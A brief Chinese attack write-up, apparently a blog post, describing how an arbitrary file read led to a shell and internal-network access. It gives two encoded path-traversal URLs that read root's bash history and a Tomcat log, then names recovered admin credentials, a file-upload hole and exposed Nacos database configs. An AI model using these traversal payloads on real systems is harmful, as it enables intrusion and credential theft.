记一次某系统任意文件读取到getshell攻防笔记

IP:1880/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2F.bash_history

读取历史命令发现频繁查看日志文件

IP:1880/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Ftomcat%2Fapache-tomcat-8.5.78%2Flogs%2Fcatalina.out

下载到本地查看搜索到管理员账号密码

大量敏感数据

后台存在任意文件上传

Getshell

进内网常规打法发现几个nacos存在历史漏洞，配置信息里大量数据库。。

当前页面是本站的「Google AMP」版。查看和发表评论请点击：完整版 »